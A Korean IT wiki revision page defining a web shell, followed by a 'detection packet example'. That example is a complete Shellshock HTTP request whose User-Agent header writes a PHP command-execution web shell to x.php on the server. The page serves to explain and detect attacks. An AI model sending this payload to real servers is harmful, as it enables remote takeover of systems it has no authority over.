웹셸: Difference between revisions

From IT Wiki
No edit summary
No edit summary
Line 1: Line 1:
Web Shell; 웹페이지에서 서버에 명령어를 실행하기 위해 만들어진 프로그램
;Web Shell
; 해커가 원격에서 웹서버를 조종할 수 있도록 제작한 웹서버용 악성코드


* 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다.
* 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다.
* 웹 사이트의 다양한 취약점을 이용해 웹 서버에 업로드한 후 실행시키기 위한 용도로 사용한다.
* 웹서버가 가지고 있는 취약점을 악용해 웹쉘을 업로드시켜 웹서버를 해킹하는데 이용하거나, 해킹한 웹서버를 관리하기 위한 목적으로 설치하기도 함


== 탐지 패킷 예제 ==
== 탐지 패킷 예제 ==

Revision as of 23:58, 12 May 2019

Web Shell
해커가 원격에서 웹서버를 조종할 수 있도록 제작한 웹서버용 악성코드
  • 서버사이드 언어인 ASP. JSP, PHP, CGI 파일 등으로 작성된다.
  • 웹서버가 가지고 있는 취약점을 악용해 웹쉘을 업로드시켜 웹서버를 해킹하는데 이용하거나, 해킹한 웹서버를 관리하기 위한 목적으로 설치하기도 함

탐지 패킷 예제

GET /cgi-bin/bash_vul.cgi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: ( ){ :; }; echo "<?\$cmd=\$_REQUEST[\"cmd\"]; if(\$cmd !=\"\"){print shell_exec(\$cmd);}?>" >../html/x.php
Accept-Encoding: gzip, deflate